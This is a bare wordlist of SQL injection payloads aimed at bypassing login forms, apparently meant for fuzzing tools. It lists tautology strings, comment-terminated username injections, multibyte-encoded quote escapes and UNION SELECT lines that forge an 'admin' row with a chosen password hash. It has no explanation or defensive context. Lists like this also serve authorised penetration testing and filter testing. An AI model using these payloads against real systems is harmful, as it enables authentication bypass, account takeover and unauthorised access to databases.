" "
" #
" --
"&"
"*"
"-"
"--"
"/*
"^"
'
' #
' '
' --
' –
'#
'&'
'*'
'-'
'--
'--'
'--' / "--"
'/*
'^'
=
==
"-||0"
'-||0'
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
1′) and '1′='1–
%8C%A8%27)||1-- 2
%8C%A8%27||1-- 2
%8C%A8%27 Or 1=1-- 2
%8C%A8%27) Or 1=1-- 2
%8C%A8%27 Or 1-- 2
%8C%A8%27)Or(1)-- 2
%8C%A8%27Or(1)-- 2
%8C%A8%27) Or 1-- 2
%A8%27)||1-- 2
%A8%27||1-- 2
%A8%27 Or 1=1-- 2
%A8%27) Or 1=1-- 2
%A8%27 Or 1-- 2
%A8%27)Or(1)-- 2
%A8%27Or(1)-- 2
%A8%27) Or 1-- 2
admin" #
admin" --
admin"/*
admin' #
admin' --
admin' -- -
admin'/*
admin' and substring(password/text(),1,1)='7
admin';-- azer 
admin" or "1"="1
admin" or "1"="1"#
admin" or "1"="1"--
admin" or "1"="1"/*
admin" or 1=1
admin" or 1=1#
admin" or 1=1--
admin" or 1=1/*
admin") or "1"="1
admin") or "1"="1"#
admin") or "1"="1"--
admin") or "1"="1"/*
admin") or ("1"="1
admin") or ("1"="1"#
admin") or ("1"="1"--
admin") or ("1"="1"/*
admin' or '1'='1
admin' or '1'='1'#
admin' or '1'='1'--
admin' or '1'='1'/*
admin' or 1=1
admin' or 1=1#
admin' or 1=1--
admin' or 1=1/*
admin') or '1'='1
admin') or '1'='1'#
admin') or '1'='1'--
admin') or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'#
admin') or ('1'='1'--
admin') or ('1'='1'/*
admin"or 1=1 or ""="
admin'or 1=1 or ''='
admin' or '2' LIKE '1
admin' or 2 LIKE 2#
admin' or 2 LIKE 2--
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
 and 1=1
 and 1=1–
' and 1='1
' and a='a
' and 'one'='one
' and 'one'='one–
' and substring(password/text(),1,1)='7
%bf')||1-- 2
%bf'||1-- 2
%bf' Or 1=1 -- 2
%bf') Or 1=1 -- 2
%bf' Or 1-- 2
%bf') Or 1-- 2
%bf')Or(1)-- 2
%bf'Or(1)-- 2
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1--
 like '%'
" or "" "
" or ""&"
" or ""*"
" or ""-"
" or ""="
" or ""^"
' or '' '
' or ''&'
' or ''*'
' or ''-'
' or ''='
' or ''^'
'="or'
 or 0=0 #
 or 0=0 --
 or 0=0 –
" or 0=0 #
" or 0=0 --
" or 0=0 –
%' or '0'='0
' or         0=0 #
' or 0=0 #
' or 0=0 --
' or 0=0 –
 or 1=1
 or 1=1#
 or 1=1--
 or 1=1/*
 or 1=1–
" or "1"="1
" or "1"="1"#
" or "1"="1"--
" or "1"="1"/*
" or 1=1
" or 1=1 --
" or 1=1 –
" or 1=1#
" or 1=1--
" or 1=1/*
" or 1=1–
") or "1"="1
") or "1"="1"#
") or "1"="1"--
") or "1"="1"/*
") or ("1"="1
") or ("1"="1"#
") or ("1"="1"--
") or ("1"="1"/*
' or '1'='1
' or '1'='1'#
' or '1'='1'--
' or '1'='1'/*
' or '1′='1
' or 1=1
' or 1=1 --
' or 1=1 –
' or 1=1#
' or 1=1--
' or 1=1/*
' or 1=1;#
' or 1=1–
') or '1'='1
') or '1'='1'#
') or '1'='1'--
') or '1'='1'/*
') or '1'='1--
') or ('1'='1
') or ('1'='1'#
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1--
'or'1=1
'or'1=1′
) or '1′='1–
) or ('1′='1–
or 1=1
or 1=1#
or 1=1--
or 1=1/*
' or 1=1 limit 1 -- -+
' or 1=1 LIMIT 1;#
"or 1=1 or ""="
'or 1=1 or ''='
or 2 like 2
" or "a"="a
") or ("a"="a
' or 'a'='a
' or a=a--
' or a=a–
') or ('a'='a
') or ('a'='a and hi") or ("a"="a
'=' 'or' and '=' 'or'
' or 'one'='one
' or 'one'='one–
 or true
" or true--
") or true--
' or true--
') or true--
or true--
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
' or 'x'='x
') or ('x')=('x
') or ('x'='x
')) or (('x'))=(('x
' OR 'x'='x'#;
Pass1234.
Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.
Pass1234." AND 1=0 UniON ALL SeleCT "admin", md5("Pass1234.")#
Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.
Pass1234.' AND 1=0 UniON ALL SeleCT 'admin', md5('Pass1234.')#
Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61
Pass1234." AND 1=0 UniON SeleCT "admin", "5b19a9e947ca0fee49995f2a8b359e1392adbb61"#
Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61
Pass1234.' AND 1=0 UniON SeleCT 'admin', '5b19a9e947ca0fee49995f2a8b359e1392adbb61'#
Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658
Pass1234." AND 1=0 UniON SeleCT "admin", "fe1ff105bf807478a217ad4e378dc658"#
Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658
Pass1234.' AND 1=0 UniON SeleCT 'admin', 'fe1ff105bf807478a217ad4e378dc658'#
Pass1234." and 1=0 union select "admin",sha("Pass1234.
Pass1234." and 1=0 union select "admin",sha("Pass1234.")#
Pass1234.' and 1=0 union select 'admin',sha('Pass1234.
Pass1234.' and 1=0 union select 'admin',sha('Pass1234.')#